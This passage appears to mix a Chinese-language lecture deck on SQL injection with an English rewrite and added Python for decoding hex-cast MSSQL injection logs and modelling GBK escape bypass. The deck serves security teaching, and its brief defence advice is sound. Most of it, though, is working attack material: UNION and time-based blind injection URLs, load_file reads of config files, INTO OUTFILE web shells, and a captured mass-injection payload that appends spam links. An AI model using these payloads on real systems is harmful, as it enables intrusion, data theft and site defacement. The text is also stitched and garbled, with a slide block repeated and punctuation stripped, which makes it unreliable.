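    if "ALTER TABLE" in t and "ALTER COLUMN" in t:
        return "widen text columns"
    if "UPDATE" in t and "<A HREF=" in t:
        return "append spam link to every text column"
    if "UPDATE" in t and "SUBSTRING(" in t:
        return "strip earlier injected tags"
    return "unknown T-SQL via cast/exec"


def scan_log_lines(lines):
    """(client ip, label, decoded T-SQL) for every request carrying a
    hex-cast exec payload. Query strings are URL-decoded first because the
    attacker sends '+' for spaces, as the captured requests show."""
    findings = []
    for line in lines:
        m = HEX_EXEC_RE.search(unquote_plus(line))
        if m:
            sql = decode_hex_payload(m.group("hex"))
            findings.append((line.split()[0], classify(sql), sql))
    return findings


# Constructed sample: one clean request and one carrying a (shortened) payload.
SAMPLE_TSQL = ("set ansi_warnings off DECLARE @T VARCHA(255),@C VARCHAR(255) "
               "DECLARE Table_Cursor CURSOR FOR select c.TABLE_NAME,c.COLUMN_NAME "
               "from INFORMATION_SCHEMA.columns c EXEC('ALTER TABLE ['+@T+'] "
               "ALTER COLUMN ['+@C+'] varchar(8000) NOT NULL')")
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Dec/2012:10:03:31 +0800] "GET /view.asp?Serno=51 HTTP/1.1" 200 4183',
    '198.51.100.23 - - [01/Dec/2012:10:03:33 +0800] "GET /view.asp?Serno=51+declare+@s+varchar(8000)'
    '+set+@s=cast(0x' + SAMPLE_TSQL.encode("latin-1").hex()
    + '+as+varchar(8000))+exec(@s)-- HTTP/1.1" 200 4183',
]

if __name__ == "__main__":
    for ip, label, sql in scan_log_lines(SAMPLE_LOG):
        print(ip, label, sql[:60] + "...")
```

The same regular expression works as a WAF or IDS signature; the decoding step is what turns an alert into something an incident responder can act on, because it shows which tables were altered and what string was appended.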
References
• 吳翰清 (Wu Hanqing), 白帽子讲Web安全 (Traditional Chinese edition: 網路竟然這麼危險), 2012
• MySQL 5.1 Reference Manual, String Functions
• MySQL 5.1 Reference Manual, Miscellaneous Functions
• "MySQL/PHP 对单引号转义时 load_file/outfile 生成一句话" (writing a one-line shell with load_file/outfile when single quotes are escaped)
• Shazin Sadakath, Time Based SQL Injection using heavy queries in MySQL
• Stefan Esser, MySQL and SQL Column Truncation Vulnerabilities, 2008
1020307 伺服器端攻擊與防禦I - 大綱
bull SQL Injection
ndash 攻擊技巧
bull 判斷是否有弱點
bull 常用函數
bull UNION
bull 繞過跳脫字元
ndash ASCII編碼
ndash 16進位
ndash 雙位元組跳脫技巧
ndash SQL Blind Injection
bull Time-Based Blind SQL Injection
ndash SQL Column Truncation
SQL Injection ndash 簡介
bull Rfp ldquoNT Web Technology Vulnerabilitiesrdquo Phrack 1998
bull 維京百科
ndash SQL攻擊(SQL injection中國大陸稱作SQL注入攻擊)簡稱隱碼
攻擊是發生於應用程式之資料庫層的安全漏洞簡而言之是在輸入
的字串之中夾帶SQL指令在設計不良的程式當中忽略了檢查那麼這
些夾帶進去的指令就會被資料庫伺服器誤認為是正常的SQL指令而執行
因此遭到破壞
SQL Injection - 範例資料庫的資料
SQL Injection - 請試想這段程式碼有什麼問題
SQL Injection攻擊技巧 ndash 簡易嘗試是否有弱點
bull httpwwwhackdemocomgetUserphpid=1
bull httpwwwhackdemocomgetUserphpid=
bull httpwwwhackdemocomgetUserphpid=9999999
bull httpwwwhackdemocomgetUserphpid=1
bull httpwwwhackdemocomgetUserphpid=1+and+1=1
bull httpwwwhackdemocomgetUserphpid=1+and+1=2
SQL Injection攻擊技巧 ndash 空格與註解
bull 關鍵字大小寫混雜
bull 註解
(23) --
bull 空格
+
URL編碼 用途
09 horizontal tab
0a line feed
0b vertical tab
0c form feed
0d carriage return
20 space
SQL Injection攻擊技巧 - 猜解資料常用函數
函數 功能
LENGTH(str) 返回字串長度
LEFT(strlen) 返回某字串開頭開始的len最左字串
RIGHT(strlen) 返回某字串開頭開始的len最右字串
SUBSTRING(strposlen) 取得某字串的子字串
SUBSTR(strposlen) 為SUBSTRING同義詞
MID(strposlen) 為SUBSTRING同義詞
CHAR(N [USING charset]) 其返回值為一個包含這些整數代碼值的字串
HEX(N_or_S) 如果N或S是一個數字則返回16進位N的字串
ASCII(str) 返回值為字串str的最左邊數值
CONCAT(str1str2) 返回值為所有連接參數產生的字串
NAME_CONST(namevalue) 返回一個定值當月來產生一個結果集合列時NAME_CONST()促使該列使用定義名稱 51後限制僅能使用CONST的變數
hellip
SQL Injection攻擊技巧 - 相關系統函數
函數 功能
LOAD_FILE(file_name) 讀取檔案
INTO OUTFILE varwwwhtmlbackphp 輸出檔案
VERSION() 返回MySQL伺服器版本
DATABASE() 目前使用資料庫名稱
USER() 返回目前MySQL用戶與主機名稱
SYSTEM_USER() 與USER()同義
SESSION_USER() 與USER()同義
SCHEMA() 與DATABASE()同義
CURRENT_USER() 返回當前被驗證的用戶名與主機名組合可能與USER()值有所不同
DATADIR 讀取資料庫路徑
BASEDIR 資料庫安裝路徑
hellip
SQL Injection攻擊技巧 ndash 讀檔注意事項
bull 欲讀取文件必須在伺服器上
bull 必須指定文件完整的路徑
bull 必須有權限讀取並且文件必須完全可讀
bull 欲讀取文件必須小於 max_allowed_packet
SQL Injection攻擊技巧 ndash UNION
bull PHP+MySQL未支援多指令查詢利用聯集查詢UNION
ndash 有弱點的SQL語法沒有引號的參數(以PHP為例)
bull SELECT FROM `member` WHERE `id` =$id
ndash 沒有引號攻擊範例
bull httpwwwhackdemocomgetUserphpid=1+and+1=2+UNI
ON+SELECT+1234
ndash 實際執行語法
bull SELECT FROM `member` WHERE `id` =1 AND 1=2
UNION SELECT 1234
SQL Injection攻擊技巧 ndash UNION
bull PHP+MySQL未支援多指令查詢利用聯集查詢UNION
bull 有弱點的SQL語法有引號的參數(以PHP為例)
bull SELECT FROM `member` WHERE `name` like $name
bull 沒有引號攻擊範例
bull httpwwwhackdemocomsearchUserphpname=ha
nd1=2unionselect123user()23
bull 實際執行語法
bull SELECT FROM `member` WHERE `name` like
hand1=2unionselect123user()
SQL Injection攻擊技巧 - 成功控制語法
SQL Injection攻擊技巧 ndash 猜解資料
bull 取得長度
ndash httpwwwhackdemocomgetUserphpid=1+AND+LENGTH(PA
SSWORD)=1
ndash hellip
ndash httpwwwhackdemocomgetUserphpid=1+AND+LENGTH(PA
SSWORD)=7
bull 猜解資料
ndash httpwwwhackdemocomgetUserphpid=1+AND+RIGHT(PAS
SWORD1)=a
ndash hellip
ndash httpwwwhackdemocomgetUserphpid=1+AND+RIGHT(PAS
SWORD1)=w
SQL Injection攻擊技巧 ndash 讀寫檔案
bull 讀資料寫檔案
ndash httpwwwhackdemocomgetUserphpid=1+into+outfile+DW
ebsitewwwhackdemocommembertxt
bull 寫後門
ndash httpwwwhackdemocomgetUserphpid=1+AND+1=2+UNIO
N+SELECT+223Cphp+system($_GET[cmd])3E22234+i
nto+outfile+DWebsitewwwhackdemocomcmdphp
加上跳脫與關閉錯誤訊息這樣安全了嗎
SQL Blind Injection
bull SQL盲注入(SQL Blind Injection)也是一種SQL Injection的類型一般
SQL Injection仰賴出錯的相關訊息建構攻擊語法而盲注入完全仰賴語法
執行的對(true)錯(false)
bull SQL Blind Injection
ndash 一般盲注入
ndash Time-Based Blind SQL Injection
Time-Based Blind SQL Injection (12)
bull 透過時間的延遲來判斷該SQL語法是否執行成功
bull 技巧
ndash 內建函數
bull BENCHMARK(COUNT EXPR)
bull SLEEP(seconds)
ndash MySQL gt= 5
ndash 創建較花時間的語法(heavy queries)
Time-Based Blind SQL Injection - 使用heavy queries (22)
Time-Based Blind SQL Injection - 透過時間延遲猜解資料庫名稱
bull httpwwwhackdemocomgetUserLashphpid=1+UNION+SEL
ECT+IF(SUBSTRING(db11)=CHAR(1)BENCHMARK(5000000E
NCODE(ENCODE5s))NULL)234+FROM+(SELECT+DATABAS
E()+as+db)+AS+tb
bull hellip
bull httpwwwhackdemocomgetUserLashphpid=1+UNION+SEL
ECT+IF(SUBSTRING(db11)=CHAR(104)BENCHMARK(5000000
ENCODE(ENCODE5s))NULL)234+FROM+(SELECT+DATABA
SE()+as+db)+AS+tb
SQL Injection攻擊技巧 - 繞過跳脫字元
bull ACSII編碼
ndash ASCII() CHAR()
ndash 單一
bull CHAR(68)
ndash 多個
bull CHAR(68 58 92)
bull 16進位編碼
ndash HEX()
ndash 0x443A5C
bull 雙位元組跳脫技巧
SQL Injection攻擊技巧 - 猜解資料(繞過跳脫)
bull 猜解欄位
ndash httpwwwhackdemocomgetUserphpid=1+AND+1=2+UNIO
N+SELECT+1234+FROM+user--
ndash httpwwwhackdemocomgetUserphpid=1+AND+1=2+UNIO
N+SELECT+1234+FROM+member--
bull 猜解欄位資料
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+RIGHT
(PASSWORD1)=char(0)
ndash hellip
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+RIGHT
(PASSWORD1)=char(119)
SQL Injection攻擊技巧 - 讀取資料(繞過跳脫)
bull 讀資料寫檔案
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+1=
2+UNION+SELECT+123load_file(char(6858928710198
11510511610192119119119461049799107100101
1091114699111109921031011168511510111446
112104112))--
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+1=
2+UNION+SELECT+123load_file(0x443A5C576562736974
655C7777772E6861636B64656D6F2E636F6D5C636F6E6669
672E706870)--
SQL Injection攻擊技巧 ndash 寫檔案(無法繞過引號限制)
1 找到phpMyAdmin
2 遠端MySQL
mysqlgt use xssdb
mysqlgt set
a=0x73656C656374203078334333463730363837303230343036353736363136433238323
435463530344635333534354232373633364436343237354432393342334633452066726F6D
20787373206C696D6974203120696E746F206F757466696C652027433A2F7368656C6C2E70
687027
mysqlgt prepare cmd from a
mysqlgt execute cmd
a為
select 0x3C3F70687020406576616C28245F504F53545B27636D64275D293B3F3E from
xss limit 1 into outfile Cshellphp
寫入檔案為
ltphp eval($_POST[cmd])gt
SQL Injection攻擊技巧 - 雙位元組跳脫技巧(13)
bull 透過注入的編碼與反斜線(5c)重組產生字繞過跳脫字元的限制
bull 情境
ndash 跳脫字元處理
bull addslashes
bull mysql_escape_string
bull phpin
ndash magic_quotes_gpc 開啟
ndash 採用BIG5或GBK編碼
bull set names gbk set names big5
SQL Injection攻擊技巧 - 雙位元組跳脫技巧(23)
bull 中文語系文字以兩個位元組表示
ndash Big5
bull 高位元組 0x81-0xFE低位元組 0x40-0x7E0xA1-0xFE
ndash GBK
bull 前位元組 0x81-0xFE後位元組 0x40-0x7E
ndash GB2312
bull 前位元組 0xB0-0xF7後位元組 0xA0-0xFE
ndash 攻擊字元 BF CC D5hellip
SQL Injection攻擊技巧 -雙位元組跳脫技巧 (33)
bull 有引號的參數繞過跳脫
ndash httpwwwhackdemocomsearchUserLashphpname=h
B5+AND+1=2+UNION+SELECT+123423
ndash httpwwwhackdemocomsearchUserLashphpname=h
CC+AND+1=2+UNION+SELECT+123423
ndash httpwwwhackdemocomsearchUserLashphpname=h
d5+AND+1=2+UNION+SELECT+123423
SQL Column Truncation ndash 簡介(13)
bull MySQL中 SQL mode
ndash 沒有開啟 STRICT_ALL_TABLES
bull 使用者新增超過長度的資料會出現警告提示
bull 但資料還是會新增
ndash 開啟 STRICT_ALL_TABLES
bull 使用者新增超過長度的資料會出現提示
bull 出現ERROR 1406 該資料不會成功新增
bull 慘案
ndash 2008-09-07
bull WordPress 261 SQL Column Truncation Vulnerability
SQL Column Truncation - 效果(23)
SQL Column Truncation - 防禦方案(33)
bull 在字串中不該有空白的主動清除
ndash 如帳號類資訊
bull 在 SELECT 資料時加上 BINARY 參數
bull 在 MySQL 設定預設以 BINARY 查詢
bull 在 MySQL 開啟 STRICT_ALL_TABLES
ndash 超過欄位長度會出現 ERROR 而非出現 WARNING
ndash 新增資料為避免發生錯誤 可能需在新增修改加入額外檢查
SQL Injection ndash 延伸思考
bull INSERT 與 UPDATE 的攻擊可能發生嗎
bull NoSQL 沒有 SQL Injection
bull 其他攻擊利用
ndash Deep Blind Injection
ndash Error-Based Injection
bull Duplicate Error
bull Function
ndash information_schema
ndash 使用者自訂函數(User-Defined Functions)
ndash 觸發(Trigger)
SQL Injection ndash 自動化工具
bull Havij
bull Pangolin
bull w3af
bull Jsky
bull SQLmap
bull hellip
正確地防禦SQL Injection
bull 最低權限原則
bull 使用預先編譯敘述
bull 使用預存函數
bull 使用UTF8避免使用BIG5或GBK
bull 檢查資料型態與強制轉型
ndash bool settype(mixed amp$var string $type)
ndash intval doubleval
bull 使用安全函數
ndash OWASP ESAPI
bull MySQLCodec
MSSQL實際案例 - 116juristru自動化注入(14)
bull 201212xx 100331
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e313020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275
d20534554205b272b40432b275d3d535542535452494e47285b272b40432b275d2c20312c204348415249
4e4445582827273c2f7469746c653e3c27272c5b272b40432b275d29202d203129207768657265205b272b
40432b275d206c696b65202727253c2f7469746c653e3c252727202729204645544348204e455854204652
4f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f43
7572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varchar(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入(24)
bull 201212xx 100333
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e323020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827414c544552205441424c45205b272
b40542b275d20414c54455220434f4c554d4e205b272b40432b275d207661726368617228383030302920
4e4f54204e554c4c2729204645544348204e4558542046524f4d205461626c655f437572736f7220494e544
f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f434154452054616
26c655f437572736f72+as+varchar(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入(34)
bull 201212xx 100344
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e383020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275
d20534554205b272b40432b275d3d434f4e5645525428564152434841522838303030292c5b272b40432b
275d292b27273c2f7469746c653e3c7374796c653e2e613474777b706f736974696f6e3a6162736f6c75746
53b636c69703a726563742834353770782c6175746f2c6175746f2c3435377078293b7d3c2f7374796c653e
3c64697620636c6173733d613474773e3c6120687265663d687474703a2f2f3131366a75726973742e7275
203efef0e8e4e8f7e5f1eae8e52df3f1ebf3e3e82deceef1eae2e03c2f613e3c2f6469763e27272027292046455
44348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c
4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varc
har(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入解碼(44)
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt10 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(UPDATE [+T+] SET [+C+]=SUBSTRING([+C+] 1 CHARINDEX(lttitlegtlt[+C+]) - 1) where [+C+]
like lttitlegtlt ) FETCH NEXT FROM Table_Cursor INTO TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
bull
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt20 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(ALTER TABLE [+T+] ALTER COLUMN [+C+] varchar(8000) NOT NULL) FETCH NEXT FROM Table_Cursor INTO
TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
bull
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt80 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(UPDATE [+T+] SET
[+C+]=CONVERT(VARCHAR(8000)[+C+])+lttitlegtltstylegta4twpositionabsolutecliprect(457pxautoauto457px)lt
stylegtltdiv class=a4twgtlta href=http116juristrugtthornethegraveaumlegravedividearingntildeecircegravearing-oacutentildeeumloacuteatildeegrave-igraveicircntildeecircacircagraveltagtltdivgt ) FETCH NEXT FROM
Table_Cursor INTO TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
參考資料
bull 吳翰清 網路竟然這麼危險(白帽子讲Web安全) 2012
bull MySQL String Functions 51
bull MySQL Miscellaneous Functions 51
bull MySQLPHP 对单引号转义时load_fileoutfile 生成一句话
bull Shazin Sadakath Time Based SQL Injection using heavy queries in
MySQL
bull Stefan Esser MySQL and SQL Column Truncation Vulnerabilities 2008
SQL Injection ndash 簡介
bull Rfp ldquoNT Web Technology Vulnerabilitiesrdquo Phrack 1998
bull 維京百科
ndash SQL攻擊(SQL injection中國大陸稱作SQL注入攻擊)簡稱隱碼
攻擊是發生於應用程式之資料庫層的安全漏洞簡而言之是在輸入
的字串之中夾帶SQL指令在設計不良的程式當中忽略了檢查那麼這
些夾帶進去的指令就會被資料庫伺服器誤認為是正常的SQL指令而執行
因此遭到破壞
SQL Injection - 範例資料庫的資料
SQL Injection - 請試想這段程式碼有什麼問題
SQL Injection攻擊技巧 ndash 簡易嘗試是否有弱點
bull httpwwwhackdemocomgetUserphpid=1
bull httpwwwhackdemocomgetUserphpid=
bull httpwwwhackdemocomgetUserphpid=9999999
bull httpwwwhackdemocomgetUserphpid=1
bull httpwwwhackdemocomgetUserphpid=1+and+1=1
bull httpwwwhackdemocomgetUserphpid=1+and+1=2
SQL Injection攻擊技巧 ndash 空格與註解
bull 關鍵字大小寫混雜
bull 註解
(23) --
bull 空格
+
URL編碼 用途
09 horizontal tab
0a line feed
0b vertical tab
0c form feed
0d carriage return
20 space
SQL Injection攻擊技巧 - 猜解資料常用函數
函數 功能
LENGTH(str) 返回字串長度
LEFT(strlen) 返回某字串開頭開始的len最左字串
RIGHT(strlen) 返回某字串開頭開始的len最右字串
SUBSTRING(strposlen) 取得某字串的子字串
SUBSTR(strposlen) 為SUBSTRING同義詞
MID(strposlen) 為SUBSTRING同義詞
CHAR(N [USING charset]) 其返回值為一個包含這些整數代碼值的字串
HEX(N_or_S) 如果N或S是一個數字則返回16進位N的字串
ASCII(str) 返回值為字串str的最左邊數值
CONCAT(str1str2) 返回值為所有連接參數產生的字串
NAME_CONST(namevalue) 返回一個定值當月來產生一個結果集合列時NAME_CONST()促使該列使用定義名稱 51後限制僅能使用CONST的變數
hellip
SQL Injection攻擊技巧 - 相關系統函數
函數 功能
LOAD_FILE(file_name) 讀取檔案
INTO OUTFILE varwwwhtmlbackphp 輸出檔案
VERSION() 返回MySQL伺服器版本
DATABASE() 目前使用資料庫名稱
USER() 返回目前MySQL用戶與主機名稱
SYSTEM_USER() 與USER()同義
SESSION_USER() 與USER()同義
SCHEMA() 與DATABASE()同義
CURRENT_USER() 返回當前被驗證的用戶名與主機名組合可能與USER()值有所不同
DATADIR 讀取資料庫路徑
BASEDIR 資料庫安裝路徑
hellip
SQL Injection攻擊技巧 ndash 讀檔注意事項
bull 欲讀取文件必須在伺服器上
bull 必須指定文件完整的路徑
bull 必須有權限讀取並且文件必須完全可讀
bull 欲讀取文件必須小於 max_allowed_packet
SQL Injection攻擊技巧 ndash UNION
bull PHP+MySQL未支援多指令查詢利用聯集查詢UNION
ndash 有弱點的SQL語法沒有引號的參數(以PHP為例)
bull SELECT FROM `member` WHERE `id` =$id
ndash 沒有引號攻擊範例
bull httpwwwhackdemocomgetUserphpid=1+and+1=2+UNI
ON+SELECT+1234
ndash 實際執行語法
bull SELECT FROM `member` WHERE `id` =1 AND 1=2
UNION SELECT 1234
SQL Injection攻擊技巧 ndash UNION
bull PHP+MySQL未支援多指令查詢利用聯集查詢UNION
bull 有弱點的SQL語法有引號的參數(以PHP為例)
bull SELECT FROM `member` WHERE `name` like $name
bull 沒有引號攻擊範例
bull httpwwwhackdemocomsearchUserphpname=ha
nd1=2unionselect123user()23
bull 實際執行語法
bull SELECT FROM `member` WHERE `name` like
hand1=2unionselect123user()
SQL Injection攻擊技巧 - 成功控制語法
SQL Injection攻擊技巧 ndash 猜解資料
bull 取得長度
ndash httpwwwhackdemocomgetUserphpid=1+AND+LENGTH(PA
SSWORD)=1
ndash hellip
ndash httpwwwhackdemocomgetUserphpid=1+AND+LENGTH(PA
SSWORD)=7
bull 猜解資料
ndash httpwwwhackdemocomgetUserphpid=1+AND+RIGHT(PAS
SWORD1)=a
ndash hellip
ndash httpwwwhackdemocomgetUserphpid=1+AND+RIGHT(PAS
SWORD1)=w
SQL Injection攻擊技巧 ndash 讀寫檔案
bull 讀資料寫檔案
ndash httpwwwhackdemocomgetUserphpid=1+into+outfile+DW
ebsitewwwhackdemocommembertxt
bull 寫後門
ndash httpwwwhackdemocomgetUserphpid=1+AND+1=2+UNIO
N+SELECT+223Cphp+system($_GET[cmd])3E22234+i
nto+outfile+DWebsitewwwhackdemocomcmdphp
加上跳脫與關閉錯誤訊息這樣安全了嗎
SQL Blind Injection
bull SQL盲注入(SQL Blind Injection)也是一種SQL Injection的類型一般
SQL Injection仰賴出錯的相關訊息建構攻擊語法而盲注入完全仰賴語法
執行的對(true)錯(false)
bull SQL Blind Injection
ndash 一般盲注入
ndash Time-Based Blind SQL Injection
Time-Based Blind SQL Injection (12)
bull 透過時間的延遲來判斷該SQL語法是否執行成功
bull 技巧
ndash 內建函數
bull BENCHMARK(COUNT EXPR)
bull SLEEP(seconds)
ndash MySQL gt= 5
ndash 創建較花時間的語法(heavy queries)
Time-Based Blind SQL Injection - 使用heavy queries (22)
Time-Based Blind SQL Injection - 透過時間延遲猜解資料庫名稱
bull httpwwwhackdemocomgetUserLashphpid=1+UNION+SEL
ECT+IF(SUBSTRING(db11)=CHAR(1)BENCHMARK(5000000E
NCODE(ENCODE5s))NULL)234+FROM+(SELECT+DATABAS
E()+as+db)+AS+tb
bull hellip
bull httpwwwhackdemocomgetUserLashphpid=1+UNION+SEL
ECT+IF(SUBSTRING(db11)=CHAR(104)BENCHMARK(5000000
ENCODE(ENCODE5s))NULL)234+FROM+(SELECT+DATABA
SE()+as+db)+AS+tb
SQL Injection Techniques - Bypassing escaped characters
• ASCII encoding
  – ASCII(), CHAR()
  – Single character
    • CHAR(68)
  – Multiple characters
    • CHAR(68, 58, 92)
• Hex encoding
  – HEX()
  – 0x443A5C
• Double-byte escape technique
SQL Injection Techniques - Guessing data (bypassing escaping)
• Guess the table / columns
  – http://www.hackdemo.com/getUser.php?id=1+AND+1=2+UNION+SELECT+1,2,3,4+FROM+user--
  – http://www.hackdemo.com/getUser.php?id=1+AND+1=2+UNION+SELECT+1,2,3,4+FROM+member--
• Guess the column data
  – http://www.hackdemo.com/getUserLash.php?id=1+AND+RIGHT(PASSWORD,1)=char(0)
  – …
  – http://www.hackdemo.com/getUserLash.php?id=1+AND+RIGHT(PASSWORD,1)=char(119)
SQL Injection Techniques - Reading data (bypassing escaping)
• Read data from a file
  – http://www.hackdemo.com/getUserLash.php?id=1+AND+1=2+UNION+SELECT+1,2,3,load_file(char(68,58,92,87,101,98,115,105,116,101,92,119,119,119,46,104,97,99,107,100,101,109,111,46,99,111,109,92,103,101,116,85,115,101,114,46,112,104,112))--
  – http://www.hackdemo.com/getUserLash.php?id=1+AND+1=2+UNION+SELECT+1,2,3,load_file(0x443A5C576562736974655C7777772E6861636B64656D6F2E636F6D5C636F6E6669672E706870)--
SQL Injection Techniques – Writing files (when the quote restriction cannot be bypassed)
1. Find phpMyAdmin
2. Remote MySQL
mysql> use xssdb;
mysql> set @a=0x…;   (the hex literal, omitted here, encodes the SELECT shown below)
mysql> prepare cmd from @a;
mysql> execute cmd;
@a decodes to:
select 0x3C3F70687020406576616C28245F504F53545B27636D64275D293B3F3E from xss limit 1 into outfile 'C:/shell.php'
The file written is:
<?php @eval($_POST['cmd']);?>
SQL Injection Techniques - Double-byte escape technique (1/3)
• The injected encoded byte recombines with the escaping backslash (0x5C) into a valid character, bypassing the escape-character restriction
• Scenario
  – Escape handling by
    • addslashes
    • mysql_escape_string
    • php.ini
      – magic_quotes_gpc enabled
  – Big5 or GBK encoding in use
    • set names gbk / set names big5
SQL Injection Techniques - Double-byte escape technique (2/3)
• Chinese-language text is represented with two bytes
  – Big5
    • Lead byte 0x81-0xFE, trail byte 0x40-0x7E, 0xA1-0xFE
  – GBK
    • Lead byte 0x81-0xFE, trail byte 0x40-0x7E
  – GB2312
    • Lead byte 0xB0-0xF7, trail byte 0xA0-0xFE
  – Attack bytes: BF, CC, D5…
SQL Injection Techniques - Double-byte escape technique (3/3)
• Bypassing escaping on a quoted parameter
  – http://www.hackdemo.com/searchUserLash.php?name=h%B5'+AND+1=2+UNION+SELECT+1,2,3,4%23
  – http://www.hackdemo.com/searchUserLash.php?name=h%CC'+AND+1=2+UNION+SELECT+1,2,3,4%23
  – http://www.hackdemo.com/searchUserLash.php?name=h%d5'+AND+1=2+UNION+SELECT+1,2,3,4%23
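The failure mode on these three slides, as an added example that is not code from the original deck: byte-level escaping in the style of addslashes()/mysql_escape_string() is applied, the finished query is then interpreted the way a GBK connection (`SET NAMES gbk`) interprets it, and the check a defender can add (validate the input in the connection charset before escaping) is shown beside it. The function names, the `member` query and the sample bytes are constructed for this example.

```python
# Added example (not code from the original slides): models the byte-level
# escaping the slides name (addslashes / mysql_escape_string), shows what the
# server sees once the connection charset is GBK (`SET NAMES gbk`), and adds
# the input check a defender can apply. All sample inputs are constructed.

_ESCAPED = {0x27: b"\\'", 0x22: b'\\"', 0x5C: b"\\\\", 0x00: b"\\0"}


def addslashes(data: bytes) -> bytes:
    """Byte-oriented escaping: prefix ' " \\ and NUL with 0x5C, ignoring charset."""
    return b"".join(_ESCAPED.get(b, bytes([b])) for b in data)


def build_query(name: bytes) -> bytes:
    """The vulnerable pattern from the slides: escape, then concatenate into a
    quoted LIKE clause."""
    return b"SELECT * FROM `member` WHERE `name` like '" + addslashes(name) + b"'"


def unescaped_quotes(text: str) -> int:
    """Count single quotes not protected by a backslash, at the character level
    (the level at which MySQL's parser works after charset decoding)."""
    count = 0
    i = 0
    while i < len(text):
        if text[i] == "\\":
            i += 2  # the backslash escapes whichever character follows it
            continue
        if text[i] == "'":
            count += 1
        i += 1
    return count


def literal_is_broken(query: bytes, charset: str) -> bool:
    """Decode the finished query with the connection charset (undecodable bytes
    become U+FFFD, as a lenient conversion would) and report whether more than
    the two intended quotes survive, i.e. the string literal was broken out of.

    Under GBK, 0xBF 0x5C forms one valid character, so the 0x5C that addslashes
    inserted is swallowed and the following 0x27 is a bare quote. Under UTF-8
    the lone 0xBF is just an invalid byte and the backslash keeps working."""
    text = query.decode(charset, errors="replace")
    return unescaped_quotes(text) != 2


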